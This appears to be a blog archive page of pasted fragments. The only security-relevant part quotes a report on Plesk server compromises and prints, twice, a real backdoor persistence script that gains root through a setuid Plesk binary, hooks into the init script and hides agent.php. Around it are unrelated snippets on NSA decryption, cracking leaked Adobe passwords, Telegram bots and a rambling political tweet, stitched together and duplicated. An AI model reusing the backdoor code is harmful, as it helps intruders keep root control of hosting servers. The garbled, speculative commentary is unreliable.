Sunday, August 28, 2016
Saturday, August 27, 2016
Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story did u herad the same story?
Attackers, using the bug http://kb.parallels.com/en/112303
were able to get access to PLESK installations and install backdoors in
the systems. I’m using plural on backdoors, cause it’s not just one,
there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe
webpy-php-port /webphp/web.php
https://searchcode.com/codesearch/view/13403593/
Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques
Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.
Then..how to beat NSA as a superpower and become as powerfull as them?
parity check bit
https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650
In an interview with the New York Times, Durov said the idea of the messenger service came to him after Russia's Federal Security Service demanded that he delete opposition communities from his Vkontakte social network. After the demands were refused special service agents tried putting pressure on the programmer and searched his apartment and that of his parents. The entrepreneur then understood that he doesn't have a safe channel for communicating with friends and family, and so he decided to create a secure messaging app.
what do I understand here, is that client and server both agree on replacing the path
Example:
https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization
I just missed school for 3 months!!!! How the hell am I gonna make the semester??? Mu father is gonna kill me!!!
and then...
https://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z
Example:
[
{"op": "replace", "path": "/_AliceVersion", "value": 1},
{"op": "test", "path": "/_BobVersion", "value": 0},
//...
{"op": "replace", "path": "/some/where", "value": "something"}
]
https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization
I just missed school for 3 months!!!! How the hell am I gonna make the semester??? Mu father is gonna kill me!!!
and then...
Full guide on creating stateful Telegram bot
I have a couple of reasons to write this article. First of all I have a repository called ruby-telegram-bot-starter-kit, which contains a boilerplate for creating simple Telegram botshttps://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z
certain emails and chats were still indecipherable by the NSA database when they had been encrypted with the right tools....encryption also caused major problems for the agency, causing entire messages to disappear from the system, leaving only the message: "No decrypt available for this PGP encrypted message."
keyserver timed out when trying to add a GPG public key
...
For me it was required to add ENV statements into my docker file
....
This is usually caused by your firewall blocking the port 11371. You could unblock the port in your firewall. In case you don't have access to the firewall you could either:
1- Force it to use port 80 instead of 11371
http://unix.stackexchange.com/questions/75892/keyserver-timed-out-when-trying-to-add-a-gpg-public-key
...
For me it was required to add ENV statements into my docker file
....
This is usually caused by your firewall blocking the port 11371. You could unblock the port in your firewall. In case you don't have access to the firewall you could either:
1- Force it to use port 80 instead of 11371
http://unix.stackexchange.com/questions/75892/keyserver-timed-out-when-trying-to-add-a-gpg-public-key
Friday, August 26, 2016
I'm choosing this port analog X11 clock with Bezier curve hands
xinfocom-1.8m_1 -- Infocom game interpreter for X11
An Exception Has Occurred
An illegal value was provided for the "revision" parameter.
HTTP Response Status
400 Bad Reques
note:
http://stackoverflow.com/questions/28770110/how-to-prevent-loops-in-cubic-bezier-curves
Optical image encryption using a jigsaw transform for silhouette removal in interference-based methods and decryption with a single spatial light modulator
https://www.osapublishing.org/ao/abstract.cfm?uri=ao-50-13-1805
Tkinter: Tkinter is the Python interface to the Tk GUI toolkit shipped with Python.
http://www.tutorialspoint.com/python/python_gui_programming.htm
Multi-Plane Light Conversion
http://www.cailabs.com/technology/
Ok...let me jump from concept to concept..to see if I convince you!
so how to read pixels values on a non readeable format?
2.
How do I decrypt an Adobe Triple DES ECB-mode encrypted password?
So as you may have heard, the Adobe user database with 130 million records was leaked recently
sprintf
Format data into string
How To Generate Random Numbers In Excel Worksheets
EasyFit – Distribution Fitting Made Easy
Multiple Information Hiding Using Circular Random Grids
The Color class is used to encapsulate colors in the default
36 * sRGB color space or colors in arbitrary color spaces identified by a
37 * {@link ColorSpace}
http://www.docjar.com/html/api/java/awt/Color.java.html
Subscribe to:
Posts (Atom)
Ambassador @EmbaixadaRusPt URGENT INTEL the guy hedge fund is stable wontget higher to convince investors until end of the day @realDonaldTrump desesperate either help friends either stay with some cents @USTreasury @POLITICOEurope @ecb @FT @WSJ @EUCouncil @DeptofDefense
https://www.mediaite.com/news/billionaire-trump-backer-bill-ackman-skewers-howard-lutnicks-glaring-conflict-of-interest-he-profits-when-ou...
